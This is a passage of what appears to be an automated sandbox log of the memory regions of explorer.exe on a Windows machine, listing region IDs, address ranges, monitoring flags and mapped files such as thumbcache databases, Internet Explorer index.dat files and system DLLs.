0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 497 start_va = 0x3720000 end_va = 0x379ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 498 start_va = 0x37a0000 end_va = 0x37e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 499 start_va = 0x37f0000 end_va = 0x37f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037f0000" filename = "" Region: id = 500 start_va = 0x3800000 end_va = 0x3800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 501 start_va = 0x3810000 end_va = 0x3810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 502 start_va = 0x3820000 end_va = 0x3821fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 503 start_va = 0x3830000 end_va = 0x38affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 504 start_va = 0x38b0000 end_va = 0x38c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netshell.dll.mui" filename = "\\Windows\\System32\\en-US\\netshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netshell.dll.mui") Region: id = 505 start_va = 0x38d0000 end_va = 0x38d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 506 start_va = 0x38e0000 end_va = 0x38e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 507 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038f0000" filename = "" Region: id = 508 start_va = 0x3900000 end_va = 0x3900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 509 start_va = 0x3910000 end_va = 0x3911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003910000" filename = "" Region: id = 510 start_va = 0x3920000 end_va = 0x3921fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003920000" filename = "" Region: id = 511 start_va = 0x3930000 end_va = 0x3930fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 512 start_va = 0x3980000 end_va = 0x3980fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alttab.dll.mui" filename = "\\Windows\\System32\\en-US\\AltTab.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\alttab.dll.mui") Region: id = 513 start_va = 0x3990000 end_va = 0x3994fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 514 start_va = 0x39a0000 end_va = 0x39a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039a0000" filename = "" Region: id = 515 start_va = 0x39b0000 end_va = 0x39b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039b0000" filename = "" Region: id = 516 start_va = 0x39c0000 end_va = 0x3a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 517 start_va = 0x3a40000 end_va = 0x3a40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 518 start_va = 0x3a50000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 519 start_va = 0x3ad0000 end_va = 0x3ad1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ad0000" filename = "" Region: id = 520 start_va = 0x3ae0000 end_va = 0x3ae6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 521 start_va = 0x3af0000 end_va = 0x3af1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003af0000" filename = "" Region: id = 522 start_va = 0x3b00000 end_va = 0x3b01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b00000" filename = "" Region: id = 523 start_va = 0x3b10000 end_va = 0x3b11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 524 start_va = 0x3b20000 end_va = 0x3b20fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 525 start_va = 0x3b30000 end_va = 0x3b30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 526 start_va = 0x3b40000 end_va = 0x3b40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 527 start_va = 0x3b50000 end_va = 0x3b50fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 528 start_va = 0x3b60000 end_va = 0x3b60fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 529 start_va = 0x3b80000 end_va = 0x3b80fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 530 start_va = 0x3b90000 end_va = 0x3b90fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 531 start_va = 0x3ba0000 end_va = 0x3ba0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 532 start_va = 0x3bb0000 end_va = 0x3bd8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 533 start_va = 0x3be0000 end_va = 0x3be1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003be0000" filename = "" Region: id = 534 start_va = 0x3bf0000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 535 start_va = 0x3c00000 end_va = 0x3c07fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 536 start_va = 0x3c10000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 537 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 538 start_va = 0x3ca0000 end_va = 0x3ca7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 539 start_va = 0x3cb0000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 540 start_va = 0x3d30000 end_va = 0x3d30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d30000" filename = "" Region: id = 541 start_va = 0x3d40000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012021120220211203\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012021120220211203\\index.dat") Region: id = 542 start_va = 0x3d80000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 543 start_va = 0x3e00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 544 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 545 start_va = 0x4110000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 546 start_va = 0x4190000 end_va = 0x4592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 547 start_va = 0x45a0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 548 start_va = 0x4620000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 549 start_va = 0x46d0000 end_va = 0x474ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 550 start_va = 0x4750000 end_va = 0x4750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004750000" filename = "" Region: id = 551 start_va = 0x4780000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 552 start_va = 0x48b0000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 553 start_va = 0x49a0000 end_va = 0x5cf4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 554 start_va = 0x5d00000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 555 start_va = 0x5d80000 end_va = 0x5d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 556 start_va = 0x5dd0000 end_va = 0x5e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 557 start_va = 0x5eb0000 end_va = 0x5f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 558 start_va = 0x5f30000 end_va = 0x602ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 559 start_va = 0x6030000 end_va = 0x612ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 560 start_va = 0x6130000 end_va = 0x622ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 561 start_va = 0x6240000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 562 start_va = 0x62c0000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 563 start_va = 0x6340000 end_va = 0x63bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 564 start_va = 0x63d0000 end_va = 0x644ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063d0000" filename = "" Region: id = 565 start_va = 0x6470000 end_va = 0x647ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006470000" filename = "" Region: id = 566 start_va = 0x64c0000 end_va = 0x64cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 567 start_va = 0x6500000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 568 start_va = 0x65f0000 end_va = 0x666ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065f0000" filename = "" Region: id = 569 start_va = 0x6670000 end_va = 0x676ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 570 start_va = 0x6780000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006780000" filename = "" Region: id = 571 start_va = 0x6810000 end_va = 0x688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006810000" filename = "" Region: id = 572 start_va = 0x68b0000 end_va = 0x692ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068b0000" filename = "" Region: id = 573 start_va = 0x6a00000 end_va = 0x6a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 574 start_va = 0x6a90000 end_va = 0x6b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 575 start_va = 0x6b70000 end_va = 0x6beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b70000" filename = "" Region: id = 576 start_va = 0x6c00000 end_va = 0x6c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 577 start_va = 0x6c80000 end_va = 0x6d7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 578 start_va = 0x6d80000 end_va = 0x6e7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 579 start_va = 0x6e80000 end_va = 0x6f7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 580 start_va = 0x6f80000 end_va = 0x737ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f80000" filename = "" Region: id = 581 start_va = 0x7380000 end_va = 0x747ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 582 start_va = 0x7480000 end_va = 0x757ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 583 start_va = 0x7580000 end_va = 0x787ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007580000" filename = "" Region: id = 584 start_va = 0x7880000 end_va = 0x797ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 585 start_va = 0x7980000 end_va = 0x7aaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 586 start_va = 0x7b30000 end_va = 0x7baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b30000" filename = "" Region: id = 587 start_va = 0x7c60000 end_va = 0x7cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c60000" filename = "" Region: id = 588 start_va = 0x741a0000 end_va = 0x741a5fff monitored = 0 entry_point = 0x741a1010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 589 start_va = 0x75410000 end_va = 0x754f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 590 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 591 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 592 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 593 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 594 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 595 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 596 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 597 start_va = 0xff120000 end_va = 0xff3dffff monitored = 0 entry_point = 0xff14b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 598 start_va = 0x7fef0220000 end_va = 0x7fef02f6fff monitored = 0 entry_point = 0x7fef0221074 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 599 start_va = 0x7fef03e0000 end_va = 0x7fef0533fff monitored = 0 entry_point = 0x7fef03e7d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 600 start_va = 0x7fef0540000 end_va = 0x7fef057afff monitored = 0 entry_point = 0x7fef0541238 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 601 start_va = 0x7fef0b30000 end_va = 0x7fef0b4efff monitored = 0 entry_point = 0x7fef0b357b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 602 start_va = 0x7fef0b90000 end_va = 0x7fef0c55fff monitored = 0 entry_point = 0x7fef0b9f220 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 603 start_va = 0x7fef1f40000 end_va = 0x7fef1fb2fff monitored = 0 entry_point = 0x7fef1f9c7f8 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 604 start_va = 0x7fef2bd0000 end_va = 0x7fef2d0bfff monitored = 0 entry_point = 0x7fef2bd197c region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 605 start_va = 0x7fef2d10000 end_va = 0x7fef2dacfff monitored = 0 entry_point = 0x7fef2d9d52c region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 606 start_va = 0x7fef2db0000 end_va = 0x7fef2e86fff monitored = 0 entry_point = 0x7fef2db1254 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 607 start_va = 0x7fef2e90000 end_va = 0x7fef2ec0fff monitored = 0 entry_point = 0x7fef2e91b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 608 start_va = 0x7fef2ed0000 end_va = 0x7fef2f24fff monitored = 0 entry_point = 0x7fef2ed26e4 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 609 start_va = 0x7fef2f30000 end_va = 0x7fef2faefff monitored = 0 entry_point = 0x7fef2f31070 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 610 start_va = 0x7fef2fb0000 end_va = 0x7fef3071fff monitored = 0 entry_point = 0x7fef2fd04b4 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 611 start_va = 0x7fef3080000 end_va = 0x7fef32aafff monitored = 0 entry_point = 0x7fef3081f00 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 612 start_va = 0x7fef32b0000 end_va = 0x7fef3303fff monitored = 0 entry_point = 0x7fef32b104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 613 start_va = 0x7fef3310000 end_va = 0x7fef3ec6fff monitored = 0 entry_point = 0x7fef3311bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 614 start_va = 0x7fef3ed0000 end_va = 0x7fef3f84fff monitored = 0 entry_point = 0x7fef3ef1cd0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 615 start_va = 0x7fef3f90000 end_va = 0x7fef3fe7fff monitored = 0 entry_point = 0x7fef3f930f0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 616 start_va = 0x7fef3ff0000 end_va = 0x7fef4034fff monitored = 0 entry_point = 0x7fef3ff4190 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 617 start_va = 0x7fef4040000 end_va = 0x7fef404cfff monitored = 0 entry_point = 0x7fef4047104 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 618 start_va = 0x7fef4050000 end_va = 0x7fef40adfff monitored = 0 entry_point = 0x7fef408a7fc region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 619 start_va = 0x7fef40b0000 end_va = 0x7fef40b6fff monitored = 0 entry_point = 0x7fef40b1b24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 620 start_va = 0x7fef40c0000 end_va = 0x7fef40dffff monitored = 0 entry_point = 0x7fef40c1010 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 621 start_va = 0x7fef40e0000 end_va = 0x7fef411efff monitored = 0 entry_point = 0x7fef40e12c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 622 start_va = 0x7fef4330000 end_va = 0x7fef434efff monitored = 0 entry_point = 0x7fef4333580 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 623 start_va = 0x7fef4350000 end_va = 0x7fef450cfff monitored = 0 entry_point = 0x7fef4351010 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 624 start_va = 0x7fef4510000 end_va = 0x7fef4548fff monitored = 0 entry_point = 0x7fef4511240 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 625 start_va = 0x7fef4550000 end_va 